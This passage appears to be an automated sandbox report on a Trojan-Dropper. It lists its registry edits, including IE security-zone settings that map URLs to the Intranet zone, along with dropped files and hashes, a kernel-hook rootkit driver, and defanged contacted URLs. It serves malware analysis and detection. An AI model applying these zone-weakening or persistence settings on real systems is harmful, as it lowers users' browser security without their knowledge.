
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved]
"{00890530-6A9F-4be2-B1BB-73F01E2BB986}" = "BDShellExtMenu Class"

[HKCR\BDShellExt.BDShellExtMenu\CLSID]
"(Default)" = "{00890530-6A9F-4be2-B1BB-73F01E2BB986}"

[HKCR\CLSID\{00890530-6A9F-4be2-B1BB-73F01E2BB986}\TypeLib]
"(Default)" = "{45D1EEF3-7713-48fa-B7A5-B77229C7D330}"

[HKCR\Interface\{0C5C9741-79A4-4A5F-A9B3-9E686CFF879B}\TypeLib]
"(Default)" = "{45D1EEF3-7713-48FA-B7A5-B77229C7D330}"

[HKCR\CLSID\{00890530-6A9F-4be2-B1BB-73F01E2BB986}\VersionIndependentProgID]
"(Default)" = "BDShellExt.BDShellExtMenu"

[HKCR\CLSID\{00890530-6A9F-4be2-B1BB-73F01E2BB986}\ProgID]
"(Default)" = "BDShellExt.BDShellExtMenu.1"

[HKCR\AllFilesystemObjects\shellex\ContextMenuHandlers\BDShellExt]
"(Default)" = "{00890530-6A9F-4be2-B1BB-73F01E2BB986}"

[HKCR\CLSID\{0C5C9741-79A4-4A5F-A9B3-9E686CFF879B}]
"(Default)" = "PSFactoryBuffer"

[HKCR\AppID\{FBE0E29B-01DB-4876-B147-46F5AABA6823}]
"(Default)" = "BDShellExt"

[HKCR\TypeLib\{45D1EEF3-7713-48FA-B7A5-B77229C7D330}\1.0\0\win32]
"(Default)" = "%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDShellExt.dll"

[HKCR\CLSID\{00890530-6A9F-4be2-B1BB-73F01E2BB986}]
"AppID" = "{FBE0E29B-01DB-4876-B147-46F5AABA6823}"

[HKCR\CLSID\{0C5C9741-79A4-4A5F-A9B3-9E686CFF879B}\InProcServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "27 99 7B 89 57 EC C1 B7 D8 93 EE 84 98 0C 89 83"

[HKCR\Folder\shellex\ContextMenuHandlers\BDShellExt]
"(Default)" = "{00890530-6A9F-4be2-B1BB-73F01E2BB986}"

[HKCR\CLSID\{00890530-6A9F-4be2-B1BB-73F01E2BB986}]
"(Default)" = "BDShellExtMenu Class"

[HKCR\TypeLib\{45D1EEF3-7713-48FA-B7A5-B77229C7D330}\1.0\HELPDIR]
"(Default)" = ""

[HKCR\Interface\{0C5C9741-79A4-4A5F-A9B3-9E686CFF879B}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{00890530-6A9F-4be2-B1BB-73F01E2BB986}\InprocServer32]
"ThreadingModel" = "Apartment"

The process RegSvr32.exe:3316 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F0 27 92 25 03 90 1E 5F 25 10 16 1A 0B 51 F3 CF"

The process BDDownloader.exe:2896 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FF 61 09 18 D6 90 F4 B5 58 6B CA 33 77 5A 16 D1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\c:\program files\common files\baidu\bddownload\106]
"bddownloader.exe" = "Ã§â„¢Â¾Ã¥ÂºÂ¦Ã©Â«ËœÃ©â‚¬Å¸Ã¤Â¸â€¹Ã¨Â½Â½Ã¥Â¼â€¢Ã¦â€œÅ½"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan-Dropper modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan-Dropper modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan-Dropper modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process BDDownloader.exe:2700 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "04 8D A8 E3 09 0E AB 05 E0 8D 1E D3 B0 C0 65 31"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

Dropped PE files

MD5	File path
a7d710e78711d5ab90e4792763241754	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsf2.tmp\Md5dll.dll
00a0194c20ee912257df53bfe258ee4a	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsf2.tmp\System.dll
b2181e501ce4b03aa5b01d63dbec0b6e	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsf2.tmp\bind.dll
3a5ed71aa9c6846d95d57235c4c443d7	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsf2.tmp\xID.dll
8f87437f10cd1ae1d2e8a16c74edb3bd	c:\Program Files\shandian\bin\sdad.exe
5d58564e0c3a20c424c6e2485217773b	c:\Program Files\shandian\bin\shandian.exe
15e8902b36a8efb0c4bb7d9fdc47deb0	c:\Program Files\shandian\shandian.exe
a0328f4500daad0ae145537f92d1f1cb	c:\Program Files\shandian\uninst.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

Using the driver "%System%\DRIVERS\bd0001.sys" the Trojan-Dropper controls creation and closing of processes by installing the process notifier.
Using the driver "%System%\DRIVERS\bd0001.sys" the Trojan-Dropper controls creation and closing of threads by installing the thread notifier.
Using the driver "%System%\DRIVERS\bd0001.sys" the Trojan-Dropper controls loading executable images into a memory by installing the Load image notifier.
The Trojan-Dropper installs the following kernel-mode hooks:

ZwUnloadKey

Propagation

VersionInfo

No information is available.

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	23628	24064	4.46394	856b32eb77dfd6fb67f21d6543272da5
.rdata	28672	4764	5120	3.4982	dc77f8a1e6985a4361c55642680ddb4f
.data	36864	154712	1024	3.3278	7922d4ce117d7d5b3ac2cffe4b0b5e4f
.ndata	192512	49152	0	0	d41d8cd98f00b204e9800998ecf8427e
.rsrc	241664	5072	5120	3.72194	03eacc72cbae24e6e9aed232ec2175e0

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://proxy.sogou.com/?22014
hxxp://www.fjmjm.com.aqb.so/web/welcome_cn.htm?ver=2.4.1.9&guid=a14f7d081b4cb2059dd4e9cb28c131c461f1ccc2f88a430cb454a18b9b824a0f1401576007&lastver=	61.147.92.99
hxxp://61.147.92.117/web/PopWinParam.asp?d=2014419&mainver=1.0.0&popver=1.0.0&xmlver=20131020010000
hxxp://www.fjmjm.com.aqb.so/web/newioage.css	61.147.92.99
hxxp://www.fjmjm.com.aqb.so/web/images/texture.gif	61.147.92.99
hxxp://www.fjmjm.com.aqb.so/web/images/start_button.jpg	61.147.92.99
hxxp://www.fjmjm.com.aqb.so/web/images/guide_top.jpg	61.147.92.99
hxxp://njsh.cdn.sogou.com/kan/static/css/DD_belatedPNG_0.0.8a-min.js?t=
hxxp://proxy.sogou.com/css/skin_.css?V=dr
hxxp://njsh.cdn.sogou.com/imgn/v32/icon4.gif
hxxp://njsh.cdn.sogou.com/v53/imgn/v53_bicos.gif
hxxp://proxy.sogou.com/v53/jsn/v53_123n.js?V=11
hxxp://njsh.cdn.sogou.com/imgn/v32/selogo_111207.png
hxxp://njsh.cdn.sogou.com/imgn/sehome/tjv1/subnav_v41.png
hxxp://njsh.cdn.sogou.com/imgn/v32/skin3.gif
hxxp://www.fjmjm.com.aqb.so/favicon.ico	61.147.92.99
hxxp://njsh.cdn.sogou.com/imgn/v32/logo_1112293.gif
hxxp://njsh.cdn.sogou.com/imgn/v32/skin2_0.gif
hxxp://proxy.sogou.com/dh/dhrc/rec.do?block=gamev2&jsonp=__yx2q&t=1&_stamp=1401576015383
hxxp://njsh.cdn.sogou.com/imgu/2014/05/20140508103513_537.gif
hxxp://njsh.cdn.sogou.com/u/js/ufo2.js
hxxp://njsh.cdn.sogou.com/v53/imgn/v53_arrow_h.gif
hxxp://njsh.cdn.sogou.com/imgn/123ie/setting_icon.gif
hxxp://njsh.cdn.sogou.com/imgn/123ie/search_arrow.gif
hxxp://njsh.cdn.sogou.com/v53/imgn/v53_2icos.gif
hxxp://njsh.cdn.sogou.com/ads_hz/_ads_2.js?t=778653
hxxp://njsh.cdn.sogou.com/imgn/v32/titlebg.png
hxxp://ctc.ping.sogou.com/pv.gif?uigs_productid=ufo&ufoid=wan&ptype=jztf2&pcode=index&rdk=1401576015993&img=pv.gif&sourcelist=0011000100006_0011000100007_0011000100008_0011000100009_0011000100010_0011000100011&titlelist=çƒè¡€æ²™åŸŽ_é£Žäº‘æ— åŒ_ä»™ä¾ é“_å¤§é—¹å¤©å®«OL_ä¸‡ä¸–_Sogouå‚²å‰‘2
hxxp://njsh.cdn.sogou.com/v53/imgn/foot_slider.jpg
hxxp://proxy.sogou.com//v53/get_123_v53.php?block=wt&ver=v53&gfg=1&city=unknown&pid=Af22014&c=1401576016336&method=ajaf&cbf=fn
hxxp://njsh.cdn.sogou.com/imgn/v32/fbg_about.png
hxxp://proxy.sogou.com/jsn/hotdata.js?V=1401576016368
hxxp://ctc.ping.sogou.com/pv.gif?uigs_productid=daohang&rdk=1401576016352&img=pv.gif&pars=?rand=1401576016352&suid=null&sduv=1401576016258_7438_00001&ckid=7763_00001_00000_1371_00000_00000&m=null&apid=null&sgtp=null&refer=&page=&pageUrl=http%3A%2F%2F123.sogou.com%2F%3F22014&loc=null&hp=-1&pid=Af22014&ptype=index&pcode=index&yyid=null&skin=null&ver=v53_ie6_dr__4&sys=100&ser=null&sev=null&time=3641
hxxp://proxy.sogou.com/images/weather/cloudy.gif
hxxp://njsh.cdn.sogou.com/jsn/citydata.js
hxxp://njsh.cdn.sogou.com/jsn/v33_sugg_ajaj_v40_3.js
hxxp://njsh.cdn.sogou.com/imgn/v51/new-erweima2.png
hxxp://njsh.cdn.sogou.com/imgn/tips/skin_tips_n1.gif
hxxp://njsh.cdn.sogou.com/imgn/v32/setskinbg.gif
hxxp://njsh.cdn.sogou.com/imgu/2013/05/20130531144119_126.png
hxxp://njsh.cdn.sogou.com/v53/jsn/main.js?V=107ff6db9da3d62875c7cafb326229a51
hxxp://njsh.cdn.sogou.com/imgu/2013/08/20130820165531_481.gif
hxxp://ctc.ping.sogou.com/pv.gif?uigs_productid=ufo&ufoid=daohang&ptype=indexv53&pcode=index&rdk=1401576021055&refer=&page=æœç‹—ç½‘å€å¯¼èˆªï¼ï¼ç½‘å€å¤§å…¨,å®žç”¨ç½‘å€,å°½åœ¨123.sogou.com&pageUrl=http://123.sogou.com/?22014&img=pv.gif&vcode=v53
hxxp://proxy.sogou.com/v53/get_tj.php?hz=4671920&ids=qiche
hxxp://njsh.cdn.sogou.com/v53/imgn/guide_tip.png
hxxp://njsh.cdn.sogou.com/imgu/2014/05/20140526163043_207.jpg
hxxp://njsh.cdn.sogou.com/imgu/2014/05/20140526163242_997.jpg
hxxp://njsh.cdn.sogou.com/imgu/2014/05/20140526163446_912.jpg
hxxp://njsh.cdn.sogou.com/imgu/2014/05/20140526170756_638.jpg
hxxp://njsh.cdn.sogou.com/imgu/2014/05/20140527160745_754.jpg
hxxp://njsh.cdn.sogou.com/imgu/2014/05/20140528121909_796.jpg
hxxp://njsh.cdn.sogou.com/imgn/sehome/tjv1/img-news.gif
hxxp://njsh.cdn.sogou.com/imgn/sehome/tjv1/new-ico.png
hxxp://njsh.cdn.sogou.com/imgu/2013/08/20130830161205_609.gif
hxxp://njsh.cdn.sogou.com/imgn/v51/i-ico-2b.png
hxxp://save2.xdwscache.glb0.lxdns.com/img/news_photo/2014/05/29/mE8bXnNioe2802.jpg
hxxp://save2.xdwscache.glb0.lxdns.com/img/news_photo/2014/05/28/i8g7XZO1lz1162.jpg
hxxp://proxy.sogou.com/favicon.ico
hxxp://www.mdtxw.org.he2.aqb.so/miniindex/	112.124.102.171
hxxp://www.mdtxw.org.he2.aqb.so/miniindex/inc/stylemini.css	112.124.102.171
hxxp://www.mdtxw.org.he2.aqb.so/miniindex/inc/jquery-1.7.2.min.js	112.124.102.171
hxxp://www.mdtxw.org.he2.aqb.so/miniindex/xinwen.htm?time=undefined	112.124.102.171
hxxp://www.mdtxw.org.he2.aqb.so/miniindex/nvxing_509_366.htm?time=undefined	112.124.102.171
hxxp://www.mdtxw.org.he2.aqb.so/miniindex/shehui_509_366.htm?time=undefined	112.124.102.171
hxxp://www.mdtxw.org.he2.aqb.so/miniindex/lieqi_509_366.htm?time=undefined	112.124.102.171
hxxp://www.mdtxw.org.he2.aqb.so/miniindex/jiankang_509_366.htm?time=undefined	112.124.102.171
hxxp://www.mdtxw.org.he2.aqb.so/miniindex/meinv.htm?time=undefined	112.124.102.171
hxxp://taurus.danuoyi.tbcache.com/material/d7/4/a9ac5ed3b828895d94097c8c6faba.jpg
hxxp://drmcmm.e.shifen.com/media/id=nHRLPjm3nWRY&gp=401&time=nHnLPjmzrHckPs.jpg
hxxp://taurus.danuoyi.tbcache.com/noname.gif
hxxp://www.mdtxw.org.he2.aqb.so/miniindex/images/Untitled-1.gif	112.124.102.171
hxxp://www.mdtxw.org.he2.aqb.so/miniindex/inc/normal_bg.png	112.124.102.171
hxxp://www.mdtxw.org.he2.aqb.so/miniindex/images/Untitled-2.gif	112.124.102.171
hxxp://www.mdtxw.org.he2.aqb.so/miniindex/images/Untitled-3.jpg	112.124.102.171
hxxp://www.mdtxw.org.he2.aqb.so/miniindex/tj.js	112.124.102.171
hxxp://www.mdtxw.org.he2.aqb.so/miniindex/inc/ico_new2.png	112.124.102.171
hxxp://www.mdtxw.org.he2.aqb.so/miniindex/inc/min.png	112.124.102.171
hxxp://c.split.cnzz.com/stat.php?id=5645354
hxxp://www.mdtxw.org.he2.aqb.so/miniindex/inc/close.png	112.124.102.171
hxxp://www.mdtxw.org.he2.aqb.so/miniindex/inc/style.css	112.124.102.171
hxxp://www.mdtxw.org.he2.aqb.so/miniindex/images/b13.jpg	112.124.102.171
hxxp://www.mdtxw.org.he2.aqb.so/miniindex/images/b14.jpg	112.124.102.171
hxxp://z12.cnzz.com/stat.htm?id=5645354&r=&lg=en-us&ntime=none&repeatip=0&rtime=0&cnzz_eid=1321967991-1401593629-&showp=1024x768&st=0&sin=&t=undefinedundefinedundefinedundefinedundefined&rnd=2009664034
hxxp://c.split.cnzz.com/core.php?web_id=5645354&t=z
hxxp://www.mdtxw.org.he2.aqb.so/miniindex/images/b15.jpg	112.124.102.171
hxxp://z12.cnzz.com/stat.htm?id=5645354&r=http://www.mdtxw.org/miniindex/&lg=en-us&ntime=1401593629&repeatip=1&rtime=0&cnzz_eid=1321967991-1401593629-&showp=1024x768&st=-17588&sin=none&t=undefinedundefinedundefined&rnd=348941059
hxxp://www.mdtxw.org.he2.aqb.so/miniindex/images/b16.jpg	112.124.102.171
hxxp://www.mdtxw.org.he2.aqb.so/miniindex/images/b17.jpg	112.124.102.171
hxxp://pcookie.split.cnzz.com/9.gif?abc=1&rnd=2044816123
hxxp://www.mdtxw.org.he2.aqb.so/miniindex/images/b18.JPG	112.124.102.171
hxxp://pcookie.split.cnzz.com/9.gif?abc=1&rnd=1384439699
hxxp://www.mdtxw.org.he2.aqb.so/miniindex/images/b19.JPG	112.124.102.171
hxxp://pcookie.split.cnzz.com/app.gif?&cna=H40RDBRX0EsCAbhrJiYbIGdr
hxxp://www.mdtxw.org.he2.aqb.so/miniindex/images/aaa4.jpg	112.124.102.171
hxxp://pcookie.split.cnzz.com/9.gif?abc=1&rnd=569175671
hxxp://pcookie.split.cnzz.com/app.gif?&cna=H40RDLEq1ksCAbhrJiZN4/ 3
hxxp://www.mdtxw.org.he2.aqb.so/miniindex/images/aaa3.jpg	112.124.102.171
hxxp://z12.cnzz.com/stat.htm?id=5645354&r=http://www.mdtxw.org/miniindex/&lg=en-us&ntime=1401593629&repeatip=2&rtime=0&cnzz_eid=1321967991-1401593629-&showp=1024x768&st=-17586&sin=none&t=undefinedundefinedundefined&rnd=25106375
hxxp://www.mdtxw.org.he2.aqb.so/miniindex/images/aaa5.jpg	112.124.102.171
hxxp://www.mdtxw.org.he2.aqb.so/miniindex/images/aaa6.jpg	112.124.102.171
hxxp://www.mdtxw.org.he2.aqb.so/miniindex/images/aaa1.jpg	112.124.102.171
hxxp://www.mdtxw.org.he2.aqb.so/miniindex/images/aaa2.jpg	112.124.102.171
hxxp://www.mdtxw.org.he2.aqb.so/miniindex/images/aaa7.jpg	112.124.102.171
hxxp://www.mdtxw.org.he2.aqb.so/miniindex/images/aaa8.jpg	112.124.102.171
hxxp://www.mdtxw.org.he2.aqb.so/miniindex/images/aaa9.jpg	112.124.102.171
hxxp://www.mdtxw.org.he2.aqb.so/miniindex/images/aaa10.jpg	112.124.102.171
hxxp://pcookie.split.cnzz.com/9.gif?abc=1&rnd=1755494700
hxxp://z12.cnzz.com/stat.htm?id=5645354&r=http://www.mdtxw.org/miniindex/&lg=en-us&ntime=1401593629&repeatip=3&rtime=0&cnzz_eid=1321967991-1401593629-&showp=1024x768&st=-17582&sin=none&t=undefinedundefinedundefined&rnd=1579681700
hxxp://pcookie.split.cnzz.com/9.gif?abc=1&rnd=2114589013
hxxp://z12.cnzz.com/stat.htm?id=5645354&r=http://www.mdtxw.org/miniindex/&lg=en-us&ntime=1401593629&repeatip=4&rtime=0&cnzz_eid=1321967991-1401593629-&showp=1024x768&st=-17580&sin=none&t=undefinedundefinedundefined&rnd=408044026
hxxp://61.147.92.117/a/cpv1.html?t=20140601113322
hxxp://61.147.92.117/a/Close.gif
hxxp://e.70e.com/cpc_img.asp?u=34496&m=6&n=1719,1685,1706,1707,1718&s_px=1	125.78.241.119
hxxp://e.70e.com/js/cpc_img.js	125.78.241.119
hxxp://e.70e.com/code/cpc_swf.asp?s_noadid=1719,1685,1706,1707,1718&s_width=300&s_height=250&s_id=34496&s_attrib=0&ref=&l=1	125.78.241.119
hxxp://e.70e.com/s_style/cpc_ztyw.css	125.78.241.119
hxxp://e.70e.com/js/jquery-1.7.2.min.js	125.78.241.119
hxxp://lg1236.565882.com/pShow.php?PID=5534	115.238.244.82
hxxp://e.70e.com/code/2012_swf.js	125.78.241.119
hxxp://img.70e.com/s_images/s_foot_logo.png	125.78.241.116
hxxp://img.70e.com/code/flash/lq2/300250/0.gif	125.78.241.116
hxxp://e.70e.com/images/d.gif	125.78.241.119
hxxp://cache.adm.cnzz.net/material/d7/4/a9ac5ed3b828895d94097c8c6faba.jpg	195.27.31.240
hxxp://www.mdtxw.org/miniindex/inc/ico_new2.png	112.124.102.171
hxxp://www.mdtxw.org/miniindex/images/Untitled-2.gif	112.124.102.171
hxxp://www.mdtxw.org/miniindex/images/aaa1.jpg	112.124.102.171
hxxp://wan.sogou.com/dh/dhrc/rec.do?block=gamev2&jsonp=__yx2q&t=1&_stamp=1401576015383	220.181.124.3
hxxp://cache.adm.cnzz.net/noname.gif	195.27.31.240
hxxp://www.mdtxw.org/miniindex/nvxing_509_366.htm?time=undefined	112.124.102.171
hxxp://p3.123.sogoucdn.com/imgn/v51/i-ico-2b.png	58.215.147.40
hxxp://d.123.sogoucdn.com/ads_hz/_ads_2.js?t=778653	222.211.87.167
hxxp://www.mdtxw.org/miniindex/images/Untitled-1.gif	112.124.102.171
hxxp://pb.sogou.com/pv.gif?uigs_productid=daohang&rdk=1401576016352&img=pv.gif&pars=?rand=1401576016352&suid=null&sduv=1401576016258_7438_00001&ckid=7763_00001_00000_1371_00000_00000&m=null&apid=null&sgtp=null&refer=&page=&pageUrl=http%3A%2F%2F123.sogou.com%2F%3F22014&loc=null&hp=-1&pid=Af22014&ptype=index&pcode=index&yyid=null&skin=null&ver=v53_ie6_dr__4&sys=100&ser=null&sev=null&time=3641	220.181.124.110
hxxp://d.123.sogoucdn.com/v53/imgn/v53_arrow_h.gif	222.211.87.167
hxxp://123.sogou.com/css/skin_.css?V=dr	220.181.124.3
hxxp://p4.123.sogoucdn.com/imgn/v32/fbg_about.png	114.80.179.210
hxxp://www.mdtxw.org/miniindex/xinwen.htm?time=undefined	112.124.102.171
hxxp://p4.123.sogoucdn.com/imgu/2014/05/20140508103513_537.gif	114.80.179.210
hxxp://d.123.sogoucdn.com/imgn/v32/icon4.gif	222.211.87.167
hxxp://hzs10.cnzz.com/stat.htm?id=5645354&r=http://www.mdtxw.org/miniindex/&lg=en-us&ntime=1401593629&repeatip=2&rtime=0&cnzz_eid=1321967991-1401593629-&showp=1024x768&st=-17586&sin=none&t=undefinedundefinedundefined&rnd=25106375	42.156.140.25
hxxp://pic4.xcarimg.com/img/news_photo/2014/05/29/mE8bXnNioe2802.jpg	8.37.231.21
hxxp://p8.123.sogoucdn.com/imgn/tips/skin_tips_n1.gif	114.80.179.226
hxxp://www.mdtxw.org/miniindex/tj.js	112.124.102.171
hxxp://www.mdtxw.org/miniindex/images/b16.jpg	112.124.102.171
hxxp://p3.123.sogoucdn.com/imgu/2014/05/20140527160745_754.jpg	58.215.147.40
hxxp://www.fjmjm.com/web/newioage.css	61.147.92.99
hxxp://www.mdtxw.org/miniindex/lieqi_509_366.htm?time=undefined	112.124.102.171
hxxp://taoqibao.zhouliboguju.com/pShow.php?PID=5534	115.238.244.82
hxxp://hzs10.cnzz.com/stat.htm?id=5645354&r=http://www.mdtxw.org/miniindex/&lg=en-us&ntime=1401593629&repeatip=4&rtime=0&cnzz_eid=1321967991-1401593629-&showp=1024x768&st=-17580&sin=none&t=undefinedundefinedundefined&rnd=408044026	42.156.140.25
hxxp://cnzz.mmstat.com/9.gif?abc=1&rnd=569175671	42.120.219.171
hxxp://www.mdtxw.org/miniindex/images/Untitled-3.jpg	112.124.102.171
hxxp://www.mdtxw.org/miniindex/inc/close.png	112.124.102.171
hxxp://www.mdtxw.org/miniindex/inc/normal_bg.png	112.124.102.171
hxxp://p1.123.sogoucdn.com/imgn/v32/selogo_111207.png	114.80.179.206
hxxp://d.123.sogoucdn.com/v53/jsn/main.js?V=107ff6db9da3d62875c7cafb326229a51	222.211.87.167
hxxp://d.123.sogoucdn.com/v53/imgn/foot_slider.jpg	222.211.87.167
hxxp://www.mdtxw.org/miniindex/inc/stylemini.css	112.124.102.171
hxxp://p3.123.sogoucdn.com/imgn/sehome/tjv1/new-ico.png	58.215.147.40
hxxp://www.mdtxw.org/miniindex/images/b14.jpg	112.124.102.171
hxxp://d.123.sogoucdn.com/v53/imgn/v53_bicos.gif	222.211.87.167
hxxp://p5.123.sogoucdn.com/imgn/v32/logo_1112293.gif	114.80.179.210
hxxp://pcookie.cnzz.com/app.gif?&cna=H40RDBRX0EsCAbhrJiYbIGdr	42.120.219.171
hxxp://123.sogou.com/?22014	220.181.124.3
hxxp://f.70e.com/images/d.gif	125.78.241.119
hxxp://p0.123.sogoucdn.com/imgn/v32/skin3.gif	222.211.87.167
hxxp://www.mdtxw.org/miniindex/images/aaa7.jpg	112.124.102.171
hxxp://123.sogou.com/favicon.ico	220.181.124.3
hxxp://pb.sogou.com/pv.gif?uigs_productid=ufo&ufoid=daohang&ptype=indexv53&pcode=index&rdk=1401576021055&refer=&page=æœç‹—ç½‘å€å¯¼èˆªï¼ï¼ç½‘å€å¤§å…¨,å®žç”¨ç½‘å€,å°½åœ¨123.sogou.com&pageUrl=http://123.sogou.com/?22014&img=pv.gif&vcode=v53	220.181.124.110
hxxp://p1.123.sogoucdn.com/imgu/2014/05/20140526163446_912.jpg	114.80.179.206
hxxp://123.sogou.com/jsn/hotdata.js?V=1401576016368	220.181.124.3
hxxp://d.123.sogoucdn.com/v53/imgn/guide_tip.png	222.211.87.167
hxxp://stat.fjmjm.com/web/PopWinParam.asp?d=2014419&mainver=1.0.0&popver=1.0.0&xmlver=20131020010000
hxxp://www.mdtxw.org/miniindex/inc/style.css	112.124.102.171
hxxp://stat.fjmjm.com/a/Close.gif
hxxp://p5.123.sogoucdn.com/imgu/2013/08/20130830161205_609.gif	114.80.179.210
hxxp://www.mdtxw.org/miniindex/inc/min.png	112.124.102.171
hxxp://p6.123.sogoucdn.com/imgn/123ie/setting_icon.gif	114.80.179.210
hxxp://p8.123.sogoucdn.com/imgn/v32/selogo_111207.png	114.80.179.226
hxxp://www.mdtxw.org/miniindex/images/aaa8.jpg	112.124.102.171
hxxp://p0.123.sogoucdn.com/imgu/2014/05/20140526170756_638.jpg	222.211.87.167
hxxp://hzs10.cnzz.com/stat.htm?id=5645354&r=&lg=en-us&ntime=none&repeatip=0&rtime=0&cnzz_eid=1321967991-1401593629-&showp=1024x768&st=0&sin=&t=undefinedundefinedundefinedundefinedundefined&rnd=2009664034	42.156.140.25
hxxp://c.cnzz.com/core.php?web_id=5645354&t=z	42.156.140.11
hxxp://p7.123.sogoucdn.com/imgn/123ie/search_arrow.gif	222.211.87.185
hxxp://p2.123.sogoucdn.com/imgu/2013/05/20130531144119_126.png	58.215.147.42
hxxp://d.123.sogoucdn.com/kan/static/css/DD_belatedPNG_0.0.8a-min.js?t=	222.211.87.167
hxxp://p3.123.sogoucdn.com/imgn/sehome/tjv1/img-news.gif	58.215.147.40
hxxp://www.mdtxw.org/miniindex/shehui_509_366.htm?time=undefined	112.124.102.171
hxxp://www.mdtxw.org/miniindex/inc/jquery-1.7.2.min.js	112.124.102.171
hxxp://p3.123.sogoucdn.com/imgn/v51/new-erweima2.png	58.215.147.40
hxxp://www.mdtxw.org/miniindex/images/b19.JPG	112.124.102.171
hxxp://www.mdtxw.org/miniindex/meinv.htm?time=undefined	112.124.102.171
hxxp://p0.123.sogoucdn.com/imgn/v32/titlebg.png	222.211.87.167
hxxp://p5.123.sogoucdn.com/imgu/2014/05/20140526163043_207.jpg	114.80.179.210
hxxp://pic2.xcarimg.com/img/news_photo/2014/05/28/i8g7XZO1lz1162.jpg	8.37.231.19
hxxp://p1.123.sogoucdn.com/imgn/v32/skin2_0.gif	114.80.179.206
hxxp://www.mdtxw.org/miniindex/images/aaa2.jpg	112.124.102.171
hxxp://www.fjmjm.com/web/images/start_button.jpg	61.147.92.99
hxxp://www.fjmjm.com/web/images/texture.gif	61.147.92.99
hxxp://hzs10.cnzz.com/stat.htm?id=5645354&r=http://www.mdtxw.org/miniindex/&lg=en-us&ntime=1401593629&repeatip=1&rtime=0&cnzz_eid=1321967991-1401593629-&showp=1024x768&st=-17588&sin=none&t=undefinedundefinedundefined&rnd=348941059	42.156.140.25
hxxp://www.mdtxw.org/miniindex/images/aaa4.jpg	112.124.102.171
hxxp://d.123.sogou.com/jsn/v33_sugg_ajaj_v40_3.js	114.80.179.210
hxxp://p0.123.sogoucdn.com/imgu/2014/05/20140526163242_997.jpg	222.211.87.167
hxxp://p4.123.sogoucdn.com/imgn/v32/selogo_111207.png	114.80.179.210
hxxp://drmcmm.baidu.com/media/id=nHRLPjm3nWRY&gp=401&time=nHnLPjmzrHckPs.jpg	202.108.23.74
hxxp://p0.123.sogoucdn.com/imgn/sehome/tjv1/subnav_v41.png	222.211.87.167
hxxp://cnzz.mmstat.com/9.gif?abc=1&rnd=2044816123	42.120.219.171
hxxp://www.mdtxw.org/miniindex/images/b13.jpg	112.124.102.171
hxxp://p1.123.sogoucdn.com/imgu/2014/05/20140528121909_796.jpg	114.80.179.206
hxxp://d.123.sogou.com/jsn/citydata.js	114.80.179.210
hxxp://www.mdtxw.org/miniindex/jiankang_509_366.htm?time=undefined	112.124.102.171
hxxp://cnzz.mmstat.com/9.gif?abc=1&rnd=2114589013	42.120.219.171
hxxp://www.mdtxw.org/miniindex/	112.124.102.171
